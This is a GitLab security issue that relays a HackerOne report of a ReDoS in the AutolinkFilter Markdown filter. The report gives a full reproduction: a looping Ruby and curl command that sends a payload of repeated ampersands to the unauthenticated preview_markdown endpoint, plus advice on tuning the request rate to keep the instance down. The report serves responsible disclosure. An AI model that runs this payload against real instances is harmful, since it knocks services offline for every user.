ReDoS via AutolinkFilter in any Markdown fields
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #1959727](https://hackerone.com/reports/1959727)** by `ryhmnlfj` on 2023-04-24, assigned to @rshambhuni:
[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)
## Report
#### Summary
I found the server-side ReDoS via `AutolinkFilter` in any Markdown fields.
An attacker can take down the GitLab instance by sending the **unauthenticated requests** which contain the crafted payload to the `preview_markdown` endpoint.
#### Preparation before reproducing the bug
Please install the command line tools `ruby` and `curl` on your computer.
Also, please download `AutolinkFilter_ReDoS_payload.json` attached to this report.
These will be used in step 11 of the "Steps to reproduce" section.
And most importantly, please prepare a GitLab instance that you can use personally.
**DO NOT try to reproduce this bug against `gitlab.com` or other public instances.**
#### Steps to reproduce
1. Set up and launch your GitLab instance, and create a new account on it.
2. Sign in to the account you created in step 1.
3. Create a new **public group** and make a note of **the public group name** at this time.
At the same time, make a note of **the base URL with scheme** shown in "Group URL".

4. Sign out as you will be accessing as an unauthenticated user in the following steps.
5. After launching your browser's developer tools, browse to the **public group** you created in step 3 as an unauthenticated user.
6. Check the HTML rendered in step 5 and take a note of the content of `csrf-token` at this time.

7. Check the request sent to your GitLab instance in step 5 and take a note the value of `_gitlab_session` at this time.

8. Close your browser and open a command console.
9. Let's construct the command to demonstrate the ReDoS. Replace each string in the command template according to the replacement table.
* Command template:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:[CSRF_TOKEN_VALUE] --header Cookie:_gitlab_session=[SESSION_VALUE] --data [@]AutolinkFilter_ReDoS_payload.json [BASE_URL_WITH_SCHEME]groups/[PUBLIC_GROUP_NAME]/preview_markdown"); sleep 1; end'
```
* Replacement table:
| String in the command template | Replace with |
|---------------------------------|------------------------------------------------|
| `[CSRF_TOKEN_VALUE]` | the content of `csrf-token` noted in step 6 |
| `[SESSION_VALUE]` | the value of `_gitlab_session` noted in step 7 |
| `[BASE_URL_WITH_SCHEME]` | **the base URL with scheme** noted in step 3 |
| `[PUBLIC_GROUP_NAME]` | **the public group name** noted in step 3 |
For reference, here's an example in my local environment:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:E_NhtPEqA7IpGGSH0jgsfRtruz5fAeeqRxQgBn-kl2mCkdxxBHP4HC9YdK6_mDdZqxCkhzkjSzESZOvAGwJQPQ --header Cookie:_gitlab_session=26c454aeadefc013a10a0fdddabcfd12 --data [@]AutolinkFilter_ReDoS_payload.json http://my-gitlab-h1.test/groups/public_group_for_test/preview_markdown"); sleep 1; end'
```
10. Change the current directory of the command console to the directory where `AutolinkFilter_ReDoS_payload.json` is saved.
11. Run the command constructed in step 9 in the command console, and confirm the significant consumption of CPU resource.
For reference, when I ran the above command, the CPU resource of my instance with 16 CPU cores and 32GB of memory was quickly exhausted.

In an instance with performance close to the [1k Reference Architecture (with 8 CPU cores, 7.2GB memory)](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html), this CPU resource consumption causes noticeable performance degradation in tens of seconds, and visibly delays response to all other users.

Unless the crafted command is interrupted, this performance degradation will continue and get worse until the instance becomes completely unresponsive.
_NOTE: If you can confirm a surge in CPU usage at step 11, that's enough confirmation that this bug is a valid ReDoS vulnerability, based on past valid reports._
_NOTE 2: This crafted command will keep sending requests until you force it to stop. Please be sure to terminate the command after confirming the vulnerability._
###### Details about the command constructed in step 9:
The executed command send 1 request per second, and each 1 request that triggers ReDoS exhaust the resources of 1 CPU core.
The GitLab instance has the default timeout of 60 seconds per request. However, because the load per request is too high, there are many worker processes that do not finish processing even after the timeout has passed.
#### Additional informations to confirm this vulnerability meets the `A:H` criteria
**_IMPORTANT NOTE: This section contains additional information to confirm that this vulnerability meets the criteria for `A:H`. Please use this information after triage, as this section contains time-consuming steps and may be an over-verification of whether this report is valid._**
If the GitLab instance is attacked at a well-tuned RPS(requests per second) rate for a reasonable amount of time, then as long as the attack continues, the instance will take 60+ seconds to process every single request.
This indicates that timeouts are not working well under heavy load.
As a result, `500 error` will be returned for each and every request.

I describe below how to attack at a well-tuned RPS rate for a reasonable amount of time **by using the command constructed in step 9 of "Steps to reproduce" section** of this report.
1. Before running the constructed command, maintain separate session as an authenticated user by signing into the instance with a different browser than the one that obtained the unauthenticated user's CSRF token and session.
2. Iterate on executing the constructed command and adjusting the RPS rate.
The constructed command will display the PIDs of the spawned `curl` processes and the responses from the instance in the console.
Please adjust the RPS rate as described below so that 1 or 2 PIDs and several `500 error` responses are alternately displayed.
* We can adjust the RPS rate by changing the `sleep` value at the end of the command. For example, changing to `sleep 1;` will result in `RPS = 1`, `sleep 0.5;` will result in `RPS = 2`, and `sleep 2;` will result in `RPS = 0.5`.
* We need to adjust the RPS rate so that [it does not exceed the "Test RPS rates" (discribed in "Clarifying notes")](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes). As an example, for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html), "Test RPS rates" is 2 RPS.
_NOTE: Since the default timeout is 60 seconds, we need to wait a few minutes after executing the command to see the PID and error response alternately displayed. There is no problem if the PIDs is displayed continuously occasionally, but if it is clearly not working, please stop the command and adjust the RPS rate._
3. **With the tuned command still running**, visit any page on the instance with the authenticated user's session maintained in step 1 of this section.
And check if the `500 error` is returned after a response delay of 60+ seconds.
After you start getting `500 errors` for authenticated requests, wait tens of minutes and you'll start getting `500 errors` for unauthenticated requests and requests to the API.
_NOTE: This behavior seems to occur because handling authenticated requests tends to be more complex than handling unauthenticated requests._
When I tested it on my instance, it took about 10-20 minutes at a rate of 1 RPS for my instance (16 CPU cores and 32GB of memory) to reach the above DoS state.
Additionally, in a pipeline that started overlapping the above DoS state, the jobs failed with timeout because the runner was unable to communicate with the instance, and subsequent job on the pipeline was not run.


Also, when I looked at the runner logs in this state, I could see that the runner was failing to pick up the jobs.
```
$ sudo docker logs my_runner_container
[...snip...]
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
```
(Since I was using the [`gitlab/gitlab-runner:alpine` image](https://docs.gitlab.com/runner/install/docker.html#docker-images) for testing, I ran `docker logs` command to see the runner logs.)
These mean that the instance has been completely taken down, so this vulnerability fully meets [`A:H` criteria](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes).
#### What is the current bug behavior?
The vulnerable regular expression exists in the following part of the source code.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.11.0-ee/lib/banzai/filter/autolink_filter.rb#L88
```ruby
def autolink_match(match)
...
# Remove any trailing HTML entities and store them for appending
# outside the link element. The entity must be marked HTML safe in
# order to be output literally rather than escaped.
match.gsub!(/((?:&[\w#]+;)+)\z/, '')
```
At first glance, matching this regex pattern with the string `http://&&&&&& ... &&&&&&x` in `AutolinkFilter_ReDoS_payload.json` does not appear to cause backtracking.
However, as a result of sanitizing and escaping this string through the Markdown pipeline, the string passed to the variable `match` is as follows:
```
http://&&&&&& ... &&&&&&x
```
Matching this string with the pattern `/((?:&[\w#]+;)+)\z/` causes severe backtracking.
_NOTE: The crafted payload in `AutolinkFilter_ReDoS_payload.json` can be easily generated with the Ruby code `"http://" + "&" * 1_000_000 + "x"`._
#### What is the expected correct behavior?
We should either rewrite the vulnerable regex pattern `/((?:&[\w#]+;)+)\z/` so that it doesn't cause severe backtracking, or write code that does the equivalent without using regular expressions.
#### Relevant logs and/or screenshots
I put references to the screenshots at the appropriate places in this report.
I also attach the stack trace when one request was forcefully stopped after 60+ seconds.
```
Rack::Timeout::RequestTimeoutException (Request ran for longer than 60000ms ):
lib/banzai/filter/autolink_filter.rb:88:in `autolink_match'
lib/banzai/filter/autolink_filter.rb:124:in `block in autolink_filter'
lib/gitlab/string_range_marker.rb:41:in `block in mark'
lib/gitlab/string_range_marker.rb:37:in `each'
lib/gitlab/string_range_marker.rb:37:in `each_with_index'
lib/gitlab/string_range_marker.rb:37:in `mark'
lib/gitlab/string_regex_marker.rb:18:in `mark'
lib/banzai/filter/autolink_filter.rb:123:in `autolink_filter'
lib/banzai/filter/autolink_filter.rb:64:in `block in call'
lib/banzai/filter/autolink_filter.rb:59:in `call'
lib/banzai/pipeline/base_pipeline.rb:23:in `block (2 levels) in singleton class'
lib/banzai/renderer.rb:130:in `render_result'
lib/banzai/renderer.rb:166:in `cacheless_render'
lib/banzai/renderer.rb:30:in `render'
lib/banzai/renderer.rb:120:in `block in cache_collection_render'
lib/banzai/renderer.rb:119:in `each'
lib/banzai/renderer.rb:119:in `cache_collection_render'
lib/banzai/reference_extractor.rb:33:in `html_documents'
lib/banzai/reference_extractor.rb:18:in `references'
lib/gitlab/reference_extractor.rb:24:in `references'
lib/gitlab/reference_extractor.rb:43:in `block (2 levels) in <class:ReferenceExtractor>'
app/services/preview_markdown_service.rb:33:in `find_user_references'
app/services/preview_markdown_service.rb:6:in `execute'
app/controllers/concerns/preview_markdown.rb:8:in `preview_markdown'
ee/lib/gitlab/ip_address_state.rb:10:in `with'
ee/app/controllers/ee/application_controller.rb:45:in `set_current_ip_address'
app/controllers/application_controller.rb:524:in `set_current_admin'
lib/gitlab/session.rb:11:in `with_session'
app/controllers/application_controller.rb:515:in `set_session_storage'
lib/gitlab/i18n.rb:107:in `with_locale'
app/controllers/application_controller.rb:508:in `set_locale'
app/controllers/application_controller.rb:499:in `set_current_context'
lib/gitlab/metrics/elasticsearch_rack_middleware.rb:16:in `call'
lib/gitlab/middleware/memory_report.rb:13:in `call'
lib/gitlab/middleware/speedscope.rb:13:in `call'
lib/gitlab/database/load_balancing/rack_middleware.rb:23:in `call'
lib/gitlab/middleware/rails_queue_duration.rb:33:in `call'
lib/gitlab/metrics/rack_middleware.rb:16:in `block in call'
lib/gitlab/metrics/web_transaction.rb:46:in `run'
lib/gitlab/metrics/rack_middleware.rb:16:in `call'
lib/gitlab/jira/middleware.rb:19:in `call'
lib/gitlab/middleware/go.rb:20:in `call'
lib/gitlab/etag_caching/middleware.rb:21:in `call'
lib/gitlab/middleware/query_analyzer.rb:11:in `block in call'
lib/gitlab/database/query_analyzer.rb:37:in `within'
lib/gitlab/middleware/query_analyzer.rb:11:in `call'
lib/gitlab/middleware/multipart.rb:173:in `call'
lib/gitlab/middleware/read_only/controller.rb:50:in `call'
lib/gitlab/middleware/read_only.rb:18:in `call'
lib/gitlab/middleware/same_site_cookies.rb:27:in `call'
lib/gitlab/middleware/basic_health_check.rb:25:in `call'
lib/gitlab/middleware/handle_malformed_strings.rb:21:in `call'
lib/gitlab/middleware/handle_ip_spoof_attack_error.rb:25:in `call'
lib/gitlab/middleware/request_context.rb:21:in `call'
lib/gitlab/middleware/webhook_recursion_detection.rb:15:in `call'
config/initializers/fix_local_cache_middleware.rb:11:in `call'
lib/gitlab/middleware/compressed_json.rb:37:in `call'
lib/gitlab/middleware/rack_multipart_tempfile_factory.rb:19:in `call'
lib/gitlab/middleware/sidekiq_web_static.rb:20:in `call'
lib/gitlab/metrics/requests_rack_middleware.rb:79:in `call'
lib/gitlab/middleware/release_env.rb:13:in `call'
```
#### Output of checks
This bug happens on the official Docker installation of GitLab Enterprise Edition `15.11.0-ee`.
I used `Chromium 112` and `Firefox 112` on Debian 11 to verify this bug.
###### Results of GitLab environment info
Output of `sudo gitlab-rake gitlab:env:info`:
```
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.6p216
Gem Version: 3.2.33
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 15.11.0-ee
Revision: 4dce6bc3728
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.8
URL: http://my-gitlab-h1.test
HTTP Clone URL: http://my-gitlab-h1.test/some-group/some-project.git
SSH Clone URL: git@my-gitlab-h1.test:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.18.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
```
#### Impact
By exploiting this ReDoS vulnerability, an unauthenticated attacker could significantly reduce the availability of the entire the GitLab instance.
Based on [the policy of GitLab's Bug Bounty Program](https://hackerone.com/gitlab?view_policy=true), past reports, and my research on the impact of this bug, I would suggest the following CVSS score:
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High)
```
I would also like to add some detailed explanations of the notable points in the above score.
* `PR:N` : As described in the "Steps to reproduce" section, this attack can be performed by an unauthenticated attacker.
* `A:H` : This ReDoS attack causes enough load to meet the `A:H` criteria for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html) as stated in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
More specifically, this attack clearly satisfies the "Clarifying notes" condition in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
> When evaluating Availability impacts for DoS that require sustained traffic, use the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html). The number of requests must be fewer than the "test request per seconds rates" and cause 10+ seconds of user-perceivable unavailability to rate the impact as `A:H`.
In addition to the above, it is important to note that any feature with Markdown fields is vulnerable to this ReDoS attack.
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [AutolinkFilter_ReDoS_payload.json](https://h1.sec.gitlab.net/a/1d7049a4-6478-40ac-9809-8700cde6cc88/AutolinkFilter_ReDoS_payload.json)
* [create_public_group_updated.png](https://h1.sec.gitlab.net/a/4033c5b2-accc-4274-8204-872e26294bb2/create_public_group_updated.png)
* [csrf_token.png](https://h1.sec.gitlab.net/a/5a13c5cd-41f5-4c52-801c-db23bd2ce6c2/csrf_token.png)
* [session_value.png](https://h1.sec.gitlab.net/a/52306184-265b-41f7-8bbc-58f97b7cf6a7/session_value.png)
* [htop_all_cores_exhausted.png](https://h1.sec.gitlab.net/a/b08c3ee2-15c7-4815-8880-2e7c458246e7/htop_all_cores_exhausted.png)
* [response_delay.png](https://h1.sec.gitlab.net/a/3b7cfbb3-4fbf-4eeb-befc-e45b7d6cf4d2/response_delay.png)
* [500_error.png](https://h1.sec.gitlab.net/a/9ef6372b-81ac-464c-9df6-91c36ca06026/500_error.png)
* [failed_pipeline.png](https://h1.sec.gitlab.net/a/dd2dd2a9-f412-454f-863c-398e22910786/failed_pipeline.png)
* [failed_jobs_timeout.png](https://h1.sec.gitlab.net/a/7d1f61db-0406-4697-acb9-7fcccd5bf965/failed_jobs_timeout.png)
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
issue